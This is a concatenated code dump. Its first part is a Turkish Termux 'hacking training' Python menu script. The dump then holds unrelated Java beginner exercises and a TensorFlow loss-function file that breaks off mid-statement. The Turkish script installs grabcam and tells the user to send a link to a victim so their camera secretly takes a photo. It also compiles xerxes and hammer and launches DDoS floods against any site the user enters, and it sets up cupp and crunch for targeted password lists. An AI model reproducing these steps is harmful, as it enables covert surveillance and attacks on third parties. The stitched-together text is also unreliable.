elif ilk=="11":
os.system("clear")
print("""\033[1m\033[92m
Kamera Nasıl Hacklenir.
Hangi Kamera Olursa Olsun Bir Link Üzerinde Kameraya Erişim Sağlanabilir.
Bu Yüzden Kameralar Kullanılmadığı Sürece Kapatılmalıdır Ben Şahsen Kapatmıyorum
(Çünkü Bilgisayarımın Kamerası Yok \U0001f600)
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
os.system("clear")
print("Önce Gereken Aracı İndirelim")
os.system("sleep 2")
os.chdir("/data/data/com.termux/files/home")
os.system("clear")
os.system("git clone https://github.com/noob-hackers/grabcam.git")
os.chdir("/data/data/com.termux/files/home/grabcam")
os.system("chmod 777 *")
os.system("clear")
print("""\033[1m\033[92m
Şuan Aracımız Kuruldu Bu yazıdan Sonra "cd" yazıp ana dizine gidin sonra "cd grabcam" yazıpdosyaya gidin
ve "./grabcam.sh" yazarak programı çalıştırın ve ngrok olanı seçin (2. seçenek olması lazım)
Sonra Linki Kurbanınınza Gönderin Tıklartıklamaz resim çekicektır""")
elif ilk=="12":
print("""\033[1m\033[92m
Her ne kadar bunlar pek önemli olmasada bazen önemsiyoruz ama bunları yapmanızı pek önermem
zaten bununla ilgili pek çok bilgi var ama size ödev olarak bunu araştırın
bir hacker adayında olması gereken en önemli şey azmi olmasıdır. Azmi olmayan lamerlikten başka
birşey yapamaz.
Ödevinizi Unutmayın
""")
elif ilk=="13":
os.system("clear")
print("""\033[1m\033[92m
Evet Yazılımcı Olmak İsteyenler Çökün Bakayım.
Yazılım ile ilgili sektörleri 4'e Ayırabiliriz
En Bilinen Sektörler Aşağıdadır
1)Oyun Sektörü
2)Web Geliştirme Sektörü
3)Mobil Uygulama Sektörü
4)Yapay Zeka
Şimdi Sırayla İnceleyelim
""")
dev = input("Seçim Yapınız: ")
if dev=="1":
os.system("clear")
print("""\033[1m\033[92m
Oyun Sektörüde Aslında İkiye Ayrılır Ama Biz Şimdi
Bilgisayarlar İçin Oyun Sektörüne Göz Atacağız.
Hangi Yazılım Dillerini Bilmeniz Gerekir.
C# Veya C++
Ama İsterseniz Başka Bir Dilde Öğrenebilirsiniz Size Tavsiyem
Yazılımcı Olucaksanız Bu iki Dilden Birini Mutlaka Öğrenin.
Ne İle Yapılıyor Bu Oyunlar Hangi Uygulamalar Kullanılıyor
Unity Gibi Oyun Motorları Kullanılarak Yapılıyor
Bu oyun motorları sayesinde oyun yapmak çok daha kolay oluyor.
Oyun Yapmak Sadece Kodlardan İbaretmi ?
Tabikide Hayır. Bu Sektöre Bir Kere Girmeye Çalıştım Ama Bilgisayarım
Beni Yarı Yolda Bırakmasından Korktuğum İçin Giremesdim
Bu Sektöre Giriyorsanız Youtubeden Baka Baka Öğrenmeniz Zor Olur
Udemy.com adresinden Oyun Geliştirme Kursları almanızı Tavsiye Ederim
(Filitrelerden Ücretsizi Seçebilirsiniz \U0001f600)
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif dev=="2":
os.system("clear")
print("""\033[1m\033[92m
Hangi Dilleri Bilmeliyiz
HTML Bilmeniz Şart
Python, SQL, MYSQL, Php, CSS ve Java Bu Dillerde Kullanılır
Bir Web Geliştirici Olamk İstiyorsanız Veri Tabanlarını Bilmeniz Gerekir
Veri Tabanı Dilleri İse
SQL, SQLite, MYSQL vs. Bu Şekilde Gider
Bu Sektörde Gelişmek İstiyorsanız udemy.com'da Bir Sürü Ders Var Onlardan Alabilirsiniz.
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif dev=="3":
os.system("clear")
print("""\033[1m\033[92m
Mobil Uygulama Geliştirmek İçin Hangi Dilleri Bilmemiz Gerekir.
Eğer Android Uygulama Geliştirmek İstiyorsanız Kotlin Şart. Nasıl Yazılıyor Unuttum ?
Ama Ben İOS Uygılaması Yapıcam Diyorsanız Swift Dili Şarttır
Bir Kere Bir Bilgisayarınızın Olması Şart
Hangi Dili Yazmak İsyorsunuz Hangi Sektörde Olduğunuz Fark Etmez.
Bu Sektörlerin Hiçbirine Girmedim Sayılır Ayrıntılı Bilgiyi Dökümanlarda Bulabilirsiniz
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif dev=="4":
os.system("clear")
print("""\033[1m\033[92m
Çok Popüler Olan Bu Sektör
Ama Bu Alanla İlgili Bildiğim Birşey Varsa Yapay Zekalar
Kendini Geliştirebiliyor.
Size Bir Tavsiye Eğer Yapay Zeka İşine Gireceğim Diyorsanız Bilişim Derslerini Dinleyin Derim.
Bu Sektör İle İlgili Bildiğim Pek Birşey Yok Onun İçin Fazlada Söyleyeceğim Birşey Yok
""")
don=input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif ilk=="14":
os.system("clear")
print("""\033[1m\033[92m
İnternet Dediğimiz Zaman Aklımıza OSI Modeli Gelmesi Lazım
Peki Nedir Bu OSI Modeli?
osi modeli 7 layer'dan (katmandan) oluşur. Bu Katmanları Sıralıyalım.
Open System Interconnection
Physical -> Data cabel etc.
Data -> Switch, MAC Address
Network -> Route, IP Addresss
Transport -> TCP, UDP etc.
Session -> Communication
Presentation -> Jpeg, Mov, Data
Application -> HTTP, Mail Server etc.
Resimli Halini Dökümanlarda Bulabilirsiniz.
""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
os.system("clear")
print("""\033[1m\033[92m
Katman 1
İnternetin Fiziksel Tarafıdır
Katman 2
Verinin İşlendiği Bölüm
Switch Ne İşe Yarar
Kendi Ağı İçindeki Mac Adreslerini Kullanarak İletişim Sağlar
Katman 3
IP Adresi Bu Katmanda İşlenir Modemde Burada İş Görüyor
Katman 4
Transport Adından Anlışlıcağı Üzere portlar Bu Kısımda İş Görüyor.
Dış Bağlantı Buradan Salnıyor Veri Alışverişi Yapılıyor.
Katman 5
Session Açma İşlemi Dediğimiz İşlem Burada Yapılıyor
Bağlantı ve İletişim İşlemlerinin Yapıldığı Katman
Katman 6
Verinin Görselleştirilmesi Bu Katmanda Yapılıyor
JPEG MOV DATA Gibi Şeylerin Bu Katmanda İşlediğini Söyleyebiliriz.
Katman 7
Uygulama Katmanı Olarak Geçer Mail Serverleri HTTP Gibi Serverler
Bu Katmanda İşliyor Her zaman Duyduğunuz Bu Site HTTP Bu Site HTTPS Kullanıyor
Gibi Terimlerin Ana Kaynağıdır Aslında
""")
ana = input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if ana=="e" or ana=="E":
os.system("python3 TEğitim.py")
elif ana=="h" or ana=="H":
exit()
elif ilk=="15":
os.system("clear")
print("""\033[1m\033[92m
Bir Kullanıcı Adının Hangi Sitelerde Kullanıldığını Görmek Ne İşe Yarar?
Devam
Kişiye Saldırılarda Lazım Olan Bir Bilgi
""")
don = input("Ana Menüye Dönmek İstermisiniz [E/h] ")
if don=="E" or don=="e":
os.system("python3 TEğitim.py")
elif don=="h" or don=="H":
exit()
elif ilk=="16":
os.system("clear")
print("""\033[1m\033[92m
DDOS Nedir
DDoS yani Distributed Denial of Service (Dağıtık Hizmet Engelleme) saldırıları, tamamen Bilgi Güvenliği unsurlarından
Erişilebilirliği hedef almaktadır. Öncesinde sadece DoS (Denial of Service), yani tek bir kaynaktan hedefe doğru saldırı
yapılması şeklinde ortaya çıkan bu saldırı türü, zamanla şiddetinin arttırılması için çok sayıda kaynaktan tek hedefe yapılan
saldırı şekline dönüşmüştür
Bu Yaman Efkarın DDOS Hakkındaki anlatımı
DDOS Bir servisin bir bilgisayar veya bir dijital makine üzerinden paketler göndererek
hedefin devre dışı bırakılmasını sağlayan bir siber saldırıdır. DDOS'un Tanımı
Denial of Service (Dağıtık Hizmet Engelleme) gibidir(Yukarıdakini kopyaladım)
bu DDOS saldırıları kendi içinde çok dallara ayrılır
örneğin: SYN flood, ACK flood, ICMP flood gibi
(TAFSİLAT BÖLÜMÜ)
Bu gibi saldırılar yapmak için hedefte bir portun açık olması lazımdır
eğer bir ip bulup buna ben hemen ddos atarım diyorsanız yanılıyorsunuz
web sitelerinde zaten port açmak zorundalar ama istediğiniz portu yazamazsınız
""")
elif ilk=="17":
os.system("clear")
print("""\033[1m\033[92m
DDOS Atmak İçin Bir Sürü Tool Var Ama Biz Bazılarını Özel Olarak Ayırıyoruz
Daha Fazla Ayrıntı İçin Dökümanlara Göz Atabilirsiniz.
Size 2 Tool Göstereceğim İkiside Güzel Araçlar
1)xerxes
2)Hammer
""")
dev = input("Seçim Yapınız: ")
if dev=="1":
os.system("clear")
os.system("pkg install git")
os.system("pkg install clang")
os.chdir("/data/data/com.termux/files/home")
os.system("git clone https://github.com/zanyarjamal/xerxes")
os.chdir("/data/data/com.termux/files/home/xerxes")
os.system("chmod 777 xerxes.c")
os.system("clang xerxes.c -o xerxes")
os.system("clear")
t = input("Tool Kuruldu DDOS Atmak İstermisiniz [E/h] ")
if t=="e" or t=="E":
d = input("Site Adı Giriniz: ")
os.system("./xerxes " + d + " 80")
elif dev=="2":
os.system("clear")
os.system("pkg install git")
os.chdir("/data/data/com.termux/files/home")
os.system("git clone https://github.com/cyweb/hammer.git")
os.chdir("/data/data/com.termux/files/home/hammer")
t = input("Tool Kuruldu DDOS Atmak İstermisiniz [E/h] ")
if t=="e" or t=="E":
d = input("Site Adı Giriniz: ")
os.system("python3 hammer.py -s " + d + "-p 80 -t 200")
elif dev=="h" or dev=="H":
exit()
elif ilk=="18":
os.system("clear")
print("""\033[1m\033[92m
Benim Olmayan Ama Sanalcı Arkadaşlarımın Hazırlamış Olduğu Methodlar
Hack Yöntemleri Ve Daha Bir Sürü Bilgi Buradaki Linklerden Ulaşabilirsiniz
Yaman Efkarın Videolu seti
https://www.turkhackteam.org/google-android/1750135-termux-nedir-termux-hack-paketi.html
Saepin Eğitim Seti Var Dökümanlarda Bulabilirsiniz
""")
elif ilk=="19":
os.system("clear")
print("""\033[1m\033[92m
Parola Listesi Oluşturmak İçin Araçlar Var wordlist Adında
Bir Araç Var Ama Biz crunch Aracını Kullanıcağız
apt install crunch Diyerek Kurabilirsiniz
Nasıl Kullanılır
crunch "min kaç hane" "max kaç hane" "kullanılacak karakterler" -o "dosya adı.txt"
""")
elif ilk=="20":
os.system("clear")
print("""\033[1m\033[92m
Kişiye özel şifre listesi oluşturmak için cupp isimli aracı kullanacağız
Kısaca size cupp aracından bahsedeyim cupp Ortak Kullanıcı Parolaları Profilcisi anlamına gelir
Bu araç lisans penetrasyon testleri veya adli suç soruşturmaları gibi birçok durumda kullanılabilir,
CUPP bir platformdur ve Python’da yazılmıştır ve çalışması basit ama çok güçlü sonuçlarla.
Bu uygulama, bir bireye göre uyarlanmış hedeflenmiş şifre sözlükleri oluşturma konusunda bir sosyal mühendisin en iyi arkadaşıdır.-Cupp asyfasından alıntıdır.""")
dev = input("Devam Edilsin mi [E/h] ")
if dev=="E" or dev=="e":
os.system("clear")
print("Önce Gereken Aracı İndirelim")
os.system("sleep 2")
os.chdir("/data/data/com.termux/files/home")
os.system("clear")
os.system("git clone https://github.com/Mebus/cupp")
os.chdir("/data/data/com.termux/files/home/cupp")
os.system("chmod 777 *")
os.system("clear")
print("""\033[1m\033[92m
Şuan Aracımız Kuruldu Bu yazıdan Sonra "cd" yazıp ana dizine gidin sonra "cd cupp" yazıp dosyaya gidin "ls" yazıp dizini görüntüleyin ve
"python3 cupp.py" yazın gelen yerlerde bbilgileri doldurun en sonsa ise wordlist adını yazın ve wordlistiniz hazır""")
elif dev=="h" or dev=="H":
exit()
elif ilk=="21":
print("""\033[1m
\033[92m Yapımcılar (Makro-Saep) Eğitim setini aldığın için teşekkürler ilk eğitim setimizdi
takıldığın bir yer olursa instagramdan yazmayı unutma!!!
İnstagram adreslerimiz = @saep_official_ / _m4kr0""")
elif ilk=="q" or "Q":
os.system("clear")<file_sep>/README.md
# Saep
İlk Tool eğitim
## Kurulum
``apt install git -y &&
apt install python python2 -y
&& git clone https://github.com/saepsh/saep &&
cd saep && clear &&
python3 TEğitim.py``
------------------------
### <NAME>
> [INSTAGRAM](https://Instagram.com/saep_official_/)
<file_sep>/TEğitim Döküman/Saep Set/desktop.ini
[LocalizedFileNames]
Bilgisayar Kamerası Hackleme.txt=@Bilgisayar Kamerası Hackleme,0
|
42e5a36eb053cf94fb4ee91b5fb3b00ada7c8311
|
[
"Markdown",
"Python",
"INI"
] | 4
|
Python
|
asetrsaepdeneme/saep
|
81bbf7db98e983f0db723b223ebd9fddc1c8a550
|
7970097fd571ac1bef0d4dbd0630b2fd0a0b84af
|
refs/heads/master
|
<repo_name>Aytaj123/javaprogramming2<file_sep>/src/day30_arrays/StringTrimPractice.java
package day30_arrays;
public class StringTrimPractice {
public static void main(String[] args) {
String word = "Winter is coming";
word = word.trim();
System.out.println(word.length());
String a = "123";
String b = 5+4+a;
System.out.println(b);
String result = 3425 > (9*1000) ? "garden" : "patio";
result.substring(2);
System.out.println(result);
String str = "the fox ran under the bridge";
str = str.substring(4,17);
str.toUpperCase();
System.out.println(str + "ground");
String s = "the game was tied at 2-2";
String s2 = s.substring(5);
int index1 = s.indexOf("game");
int index2 = s2.indexOf("game");
if (index1 == index2) {
System.out.println(index1);
} else {
System.out.println(index2);
}
}
}
<file_sep>/src/day24_loops/Loop3.java
package day24_loops;
public class Loop3 {
public static void main(String[] args) {
int z = 5;
for ( int i = 5; i > 0; i--) {
z += 1;
}
System.out.println(z);
}
}
<file_sep>/src/day37_methods_overloading/VarArgs.java
package day37_methods_overloading;
public class VarArgs {
public static void main(String[] args) {
addNumbers(10, 5);
addNumbers(100, 200, 300);
addNumbers(23, 45, 17, 3, 7, 54, 98, 2, 13, 3, 65, 76, 4, 16, 5, 24); // it's thanks to ... (unlimited)
addNumbers();
}
public static void addNumbers (int...nums ) {
int sum = 0;
for (int n : nums) {
sum += n;
}
System.out.println("sum = " + sum);
}
}
<file_sep>/src/day09_scanner_practice/SalaryCalculatorV2.java
package day09_scanner_practice;
import java.util.Scanner;
public class SalaryCalculatorV2 {
public static void main(String[] args) {
}
}
<file_sep>/src/day40_arraylist/ArrayListLoop.java
package day40_arraylist;
import java. util.*;
public class ArrayListLoop {
public static void main(String[] args) {
List <Integer> nums = new ArrayList<>(); // polymorphic way of declaring
System.out.println(nums);
System.out.println("Size = " + nums.size());
nums.add(34); nums.add(44); nums.add(2); nums.add(26); nums.add(500); nums.add(5); nums.add(0); nums.add(17);
nums.add(65); nums.add(12); nums.add(1);
System.out.println("nums = " + nums);
nums.remove(0); // remove 1st one
System.out.println("nums = " + nums);
//nums.remove(88); // it will think it's and index. It's outofbound exception
nums.remove(new Integer(44)); //it's the way how to remove the value
System.out.println("nums = " + nums);
//for loop - iterate through all values and print
for (int i = 0; i < nums.size(); i++ ) {
System.out.println(nums.get(i));
}
//for each loop , and print all in the same line
for (Integer each : nums ) {
System.out.print(each +" ");
}
}
}
<file_sep>/src/day23_string_manipulation_while_loop/Practice.java
package day23_string_manipulation_while_loop;
public class Practice {
public static void main(String[] args) {
String s = "I will find the lost book";
String word = "";
for (int index = s.length()-1; index <= 0; index-- ) {
word += s.charAt(index);
}
System.out.println(word);
String str = "cybertek";
for (int i = 0; i <= str.length(); i+=2 ) {
System.out.println(str.charAt(i));
}
}
}
<file_sep>/src/day33_arrays/GroupFriends.java
package day33_arrays;
public class GroupFriends {
public static void main(String[] args) {
// 0 1 2 3
String [] friends = {"Saim", "Nadir","Murodil" , "Suleyman", };
for (String each : friends) {
System.out.println("Happy holidays = " + each + "!");
}
}
}
<file_sep>/src/day04_variables_intro/FirstVariables.java
package day04_variables_intro;
public class FirstVariables {
public static void main(String[] args) {
//declare variable n that can store int(whole numbers)
int n;
//assign/put value 10 to n
n = 10;
//print value of n variable
System.out.println(n);
}
}
<file_sep>/src/day39_wrapper_classes/WrapperClassMethods.java
package day39_wrapper_classes;
import java.awt.geom.Line2D;
public class WrapperClassMethods {
public static void main(String[] args) {
System.out.println(Integer.max(5,10));
System.out.println(Integer.sum(15,35));
System.out.println(Integer.min(3, 78));
System.out.println(Integer.compare(5, 8));
System.out.println("MIN INT: " + Integer.MIN_VALUE);
System.out.println(Double.max(234.4,23.9));
System.out.println(Double.compare(5,1));
System.out.println(Double.compare(5,5));
System.out.println(Double.compare(5,45));
System.out.println(Character.isDigit('8'));
System.out.println(Character.isDigit('v'));
char letter = 'A';
if (Character.isUpperCase(letter)) {
System.out.println("It is an upppercase");
}
String word = "JaVa iS FuN";
for (int i = 0; i < word.length(); i++) {
if (Character.isUpperCase(word.charAt(i))) {
System.out.print(word.charAt(i));
}
}
System.out.println(Character.MIN_VALUE);
System.out.println(Character.MAX_VALUE);
System.out.println(Boolean.TRUE);
}
}
<file_sep>/src/day32_arrays_split/SentenceSplit.java
package day32_arrays_split;
public class SentenceSplit {
public static void main(String[] args) {
String sentence = "Java is fun";
String [] words = sentence.split(" ");
System.out.println("First word = " + words[0]);
System.out.println("Second word = " + words[1]);
System.out.println("Third word = " + words[2]);
// System.out.println("Fourth word = " + words[3]); out of bound
for (String w : words) {
System.out.println(w);
}
String googleResult = "About 1,810,000 results (0.68 seconds)";
System.out.println(googleResult.split(" ")[1] + " = result");
System.out.println(googleResult.split(" ")[3].replace("("," ") + " = seconds");
}
}
<file_sep>/src/day09_scanner_practice/TemperatureConverter.java
package day09_scanner_practice;
import java.util.Scanner;
public class TemperatureConverter {
public static void main(String[] args) {
Scanner scan = new Scanner(System.in);
System.out.println(" ##### F TO C CONVERTER ##### ");
System.out.println("Enter Fahrenheit value:");
double fahrenheitValue = scan.nextDouble();
double celciusValue = (fahrenheitValue - 32) * 5 / 9;
System.out.println(fahrenheitValue + " F is in C " + celciusValue);
}
}
<file_sep>/src/day32_arrays_split/ShoppingItems.java
package day32_arrays_split;
public class ShoppingItems {
public static void main(String[] args) {
// 0 1 2 3 4 5
String[] items = {"Shoes", "Jacket","Gloves", "Airpods", "iPad", "iphone 12 case" };
double[] prices = { 99.99, 150.0, 9.99, 250.0 , 439.50, 39.99};
int[] itemIDs = {12345 , 12346, 12347, 12348, 12349, 12350};
System.out.println("-----FIND AN INDEX OF 'Gloves' in items array-----");
//use for loop with conditions
for (int i = 0; i < items.length; i++) {
if (items[i].equals("Gloves")){
System.out.println("Gloves were found at index " + i);
break;
}
// System.out.println(i + "-" + items[i]);
}
System.out.println("-----Set boolean to true if IPAD is found-----");
boolean iPadExists = false;
for (int i = 0; i < items.length; i++ ) {
if (items[i].equals("iPad" ) ) {
iPadExists = true;
break;
}
}
System.out.println("iPadExists = " + iPadExists);
System.out.println("-----Print a report of each shopping item-----");
for (int i = 0; i < items.length; i++) {
System.out.println(items[i] + " - $" +prices[i] + " - #" + itemIDs[i]);
//break;
}
System.out.println("-----Print all details about the jacket-----");
for (int i = 0; i < items.length; i++) {
if (items[i].equalsIgnoreCase("Jacket") ) {
System.out.println(items[i] + " - $" + prices[i] + " - #" + itemIDs[i]);
}
}
}
}
<file_sep>/src/day31_arrays/BinarySearch.java
package day31_arrays;
import java.util.*;
public class BinarySearch {
public static void main(String[] args) {
int [] nums = {23, 123, 654, 2344, 12345, 14421};
System.out.println(Arrays.binarySearch(nums,23));
System.out.println(Arrays.binarySearch(nums, 2344));
System.out.println(Arrays.binarySearch(nums, 25));
System.out.println(Arrays.binarySearch(nums, 700));
System.out.println(Arrays.binarySearch(nums, -5));
}
}
<file_sep>/src/day03_escape_sequence/EmployeeInfo.java
package day03_escape_sequence;
public class EmployeeInfo {
public static void main(String[] args) {
System.out.println("Company name:\tGoogle\nEmployee:\t\tAytaj");
}
}
<file_sep>/src/day06_arithmetic_operators/arithmeticOperatorsPractice.java
package day06_arithmetic_operators;
public class arithmeticOperatorsPractice {
public static void main(String[] args) {
//short s = 13 - 9/3 * 10
//s += -10
//System.out.println(s);
//int a = 10
//a = --a + a++ + a-- + a++
//System.out.println(a);
//short s = 13 + 3 * (10-6) % 2
//boolean b = s != 25
//System.out.println(b);
//byte b = 104
//boolean check = b < 100
double decimal = 13.142;
int whole = decimal < 20 ? 20 : 10;
System.out.println(whole);
}
}
<file_sep>/src/day34_void_methods/StartCheapCar.java
package day34_void_methods;
public class StartCheapCar {
public static void main(String[] args) {
//seatInCar();
//startTheCar();
//shiftToDrive();
//pressGasPedal();
}
}
<file_sep>/src/day45_oop/CoffeeObject.java
package day45_oop;
public class CoffeeObject {
public static void main(String[] args) {
Coffee latte = new Coffee();
System.out.println("Coffee amount = " + latte.getAmount());
latte.refill();
System.out.println("Amount after refill = " + latte.getAmount());
latte.drink(10);
System.out.println("Amount after drinking = " + latte.getAmount());
//NOT: myCoffee.type = "Turkish coffee"; INSTEAD using a method
latte.setType("Turkish coffee");
System.out.println("My Coffee = " + latte.getType());
//describe my coffee - show all variable values
System.out.println(latte.toString());
}
}
<file_sep>/src/day34_void_methods/EtsySearchTest.java
package day34_void_methods;
//import com.sun.xml.internal.ws.api.model.wsdl.WSDLOutput;
public class EtsySearchTest {
public static void main(String[] args) {
System.out.println("-----Starting Etsy search smoke test-----");
openBrowser();
navigateToEtsyUrl();
searchForWoodenSpoon();
verifyResultsAreDisplayed();
System.out.println("-----Etsy search smoke test is completed-----");
}
public static void openBrowser() {
System.out.println("1. Launching the Chrome browser");
}
public static void navigateToEtsyUrl() {
System.out.println("2. Navigate to etsy - https://www.etsy.com/");
}
public static void searchForWoodenSpoon() {
System.out.println("3. Search for a wooden spoon");
}
public static void verifyResultsAreDisplayed() {
System.out.println("4. Verify results");
}
}
<file_sep>/src/day03_escape_sequence/ShoppingReceipt.java
package day03_escape_sequence;
public class ShoppingReceipt {
public static void main(String[] args) {
System.out.println();
System.out.println("********************");
System.out.println();
System.out.println("--------------------");
System.out.println();
System.out.println("Cake $24");
System.out.println();
System.out.println("Bread $4.25");
System.out.println();
System.out.println("--------------------");
System.out.println("TOTAL AMOUNT: $28.25");
}
}
|
8a0175882b77892ee9c3240e5a3b26e611b20a28
|
[
"Java"
] | 19
|
Java
|
Aytaj123/javaprogramming2
|
7b628db7fff5e133d75789503c03b0a424112603
|
ba3573404fd198b9b3b49f3c908c9b8b491ff3e5
|
refs/heads/master
|
<file_sep>"""This file contains utility functions used for loss"""
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
EPSILON = 0.00001
def loss(logits, labels, type='xentropy', loss_params={}):
"""Loss function
Args:
logits: prediction before sigmoid
labels: one-hot encoded prediction
type: type of loss, can be one of the following
'xentropy':
'bounded_xentropy':
'weighted_xentropy':
'l2_distance':
'pos_weighted_l2_distance':
'subclass_weighted_xentropy'"
'focal_loss':
'dice':
'dice_2_class':
'single_class': single class, single label prediction (mutually exclusive)
loss_params: dictionary with the following keys:
'xentropy_epsilon'
'focal_loss_gamma_p'
'focal_loss_gamma_n'
'focal_loss_alpha'
'pos_weight_factor'
'position_weight_flag'
Returns:
loss_: A float tensor containing the overall loss value
Note:
For mutually-exclusive multi-label classification, use softmax cross entropy. This is NOT currently implemented.
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits, name='xentropy')
"""
# use sigmoid_cross_entropy_with_logits for multi-label classification
# get loss params
xentropy_epsilon = loss_params.get('xentropy_epsilon', 0.01)
focal_loss_gamma_p = loss_params.get('focal_loss_gamma_p', 2)
focal_loss_gamma_n = loss_params.get('focal_loss_gamma_n', 2)
focal_loss_alpha = loss_params.get('focal_loss_alpha', 0.25)
pos_weight_factor = loss_params.get('pos_weight_factor', 1)
labels = tf.to_float(labels, name='ToFloat') # to accommodate `sigmoid_cross_entropy_with_logits`
if type == 'xentropy':
cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits, name='xentropy')
elif type == 'bounded_xentropy':
cross_entropy = bounded_sigmoid_cross_entropy_with_logits(labels=labels, logits=logits,
epsilon=xentropy_epsilon, name='xentropy')
elif type == 'weighted_xentropy':
num_total = tf.to_float(tf.size(labels))
num_positives = tf.reduce_sum(labels)
num_negatives = num_total - num_positives
pos_weight = pos_weight_factor * num_negatives / (num_positives + EPSILON)
cross_entropy = tf.nn.weighted_cross_entropy_with_logits(targets=labels, logits=logits,
pos_weight=pos_weight, name='xentropy')
cross_entropy = num_total / num_negatives * cross_entropy
elif type == 'subclass_weighted_xentropy':
num_total = tf.to_float(tf.shape(labels)[0])
num_positives = tf.reduce_sum(labels, axis=0)
num_negatives = num_total - num_positives
pos_weight = pos_weight_factor * num_negatives / (num_positives + EPSILON)
cross_entropy = tf.nn.weighted_cross_entropy_with_logits(targets=labels, logits=logits,
pos_weight=pos_weight, name='xentropy')
cross_entropy = num_total / num_negatives * cross_entropy
print('pos weight dimension {}'.format(pos_weight.get_shape()))
print('labels dimension {}'.format(labels.get_shape()))
print('cross_entropy dimension {}'.format(cross_entropy.get_shape()))
elif type == 'focal_loss':
cross_entropy = focal_loss(prediction_tensor=logits, target_tensor=labels,
alpha=focal_loss_alpha,
gamma_p=focal_loss_gamma_p,
gamma_n=focal_loss_gamma_n)
cross_entropy = tf.reshape(cross_entropy, [-1])
cross_entropy = tf.map_fn(nan_guard, cross_entropy)
elif type == 'xentropy':
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits,
name='xentropy')
elif type == 'l2_distance':
# this is not by definition `cross_entropy`, but we use it anyway for loss calc
cross_entropy = (labels - logits) ** 2
elif type == 'pos_weighted_l2_distance':
# NB. add weighs
# slice logits and labels where labels is greater than -100
position_weight_dict = {
1: 1,
2: [0, 0, 1, 1],
3: [0, 0, 1, 1, 0],
4: [0, 0, 1, 1, 1, 1, 1], # no muscle
5: [0, 0, 0, 0, 1, 1, 0], # mlo nipple only
}
position_weight_list = position_weight_dict[loss_params.get('position_weight_flag', 1)]
mask = tf.cast(tf.greater(labels, -100), tf.float32)
cross_entropy = ((labels - logits) * position_weight_list * mask) ** 2
# add to tensorboard
loss_muscle = tf.reduce_mean(cross_entropy[:2])
loss_nipple_cc = tf.reduce_mean(cross_entropy[2:4])
loss_nipple_mlo = tf.reduce_mean(cross_entropy[4:6])
loss_density = tf.reduce_mean(cross_entropy[6:])
tf.summary.scalar('loss_muscle', loss_muscle)
tf.summary.scalar('loss_nipple_cc', loss_nipple_cc)
tf.summary.scalar('loss_nipple_mlo', loss_nipple_mlo)
tf.summary.scalar('loss_density', loss_density)
# tf.summary.value.add(tag='loss_muscle', simple_value=avg_valid_loss)
elif type == 'l4_distance':
cross_entropy = (labels - logits) ** 4
elif type == 'l2_4_distance':
def l2_4_loss_fn(d):
# This maps scalar tensor (rank-0 tensor) to scalar
return tf.case(
pred_fn_pairs=[
(tf.abs(d) <= 1, lambda: 2 * (d ** 2))],
default=lambda: d ** 4 + 1, exclusive=True)
difference = labels - logits
orig_shape = tf.shape(difference) # NB. a.get_shape() is equivalent to a.shape and returns static shape
difference = tf.reshape(difference, [-1])
cross_entropy = tf.map_fn(l2_4_loss_fn, difference)
cross_entropy = tf.reshape(cross_entropy, orig_shape)
elif type == 'flat_bottom_l3_distance':
def l3_loss_fn(d):
# This maps scalar tensor (rank-0 tensor) to scalar
return tf.case(
pred_fn_pairs=[
(d > 1, lambda: (d - 1) ** 3),
(d < -1, lambda: -(d + 1) ** 3)],
default=lambda: tf.constant(0, dtype=tf.float32), exclusive=True)
difference = labels - logits
orig_shape = tf.shape(difference) # NB. a.get_shape() is equivalent to a.shape and returns static shape
difference = tf.reshape(difference, [-1])
cross_entropy = tf.map_fn(l3_loss_fn, difference)
cross_entropy = tf.reshape(cross_entropy, orig_shape)
elif type == 'l4_log_loss':
def l4_log_loss_fn(d):
# This maps scalar tensor (rank-0 tensor) to scalar
return tf.case(
pred_fn_pairs=[
(tf.abs(d) <= 1, lambda: (d ** 4)/12)],
default=lambda: -tf.log((4-tf.abs(d))/4) + 1/12 - tf.log(4/3), exclusive=True)
difference = labels - logits
orig_shape = tf.shape(difference) # NB. a.get_shape() is equivalent to a.shape and returns static shape
difference = tf.reshape(difference, [-1])
cross_entropy = tf.map_fn(l4_log_loss_fn, difference)
cross_entropy = tf.reshape(cross_entropy, orig_shape)
elif type == 'dice':
predictions = tf.nn.sigmoid(logits)
dice_numerator_1 = tf.reduce_sum(tf.multiply(labels, predictions), axis=0) + EPSILON
dice_denominator_1 = tf.reduce_sum(predictions, axis=0) + tf.reduce_sum(labels, axis=0) + EPSILON
dice_numerator_2 = tf.reduce_sum(tf.multiply((1 - labels), (1 - predictions)), axis=0) + EPSILON
dice_denominator_2 = tf.reduce_sum((1 - predictions), axis=0) + tf.reduce_sum((1 - labels),
axis=0) + EPSILON
cross_entropy = 1 - (tf.div(dice_numerator_1, dice_denominator_1)
- pos_weight_factor * tf.div(dice_numerator_2, dice_denominator_2))
elif type == 'dice_2_class':
predictions = tf.nn.softmax(logits)
dice_numerator_1 = tf.reduce_sum(tf.multiply(labels, tf.slice(predictions, [0,0], [-1, 1])), axis=0) + EPSILON
dice_denominator_1 = (tf.reduce_sum(tf.slice(predictions, [0,0], [-1, 1]), axis=0)
+ tf.reduce_sum(labels, axis=0) + EPSILON)
dice_numerator_2 = tf.reduce_sum(tf.multiply((1 - labels), tf.slice(predictions, [0,1], [-1, 1])), axis=0) + EPSILON
dice_denominator_2 = (tf.reduce_sum(tf.slice(predictions, [0,1], [-1, 1]), axis=0)
+ tf.reduce_sum((1 - labels), axis=0) + EPSILON)
cross_entropy = 1 - (tf.div(dice_numerator_1, dice_denominator_1)
- pos_weight_factor * tf.div(dice_numerator_2, dice_denominator_2))
else:
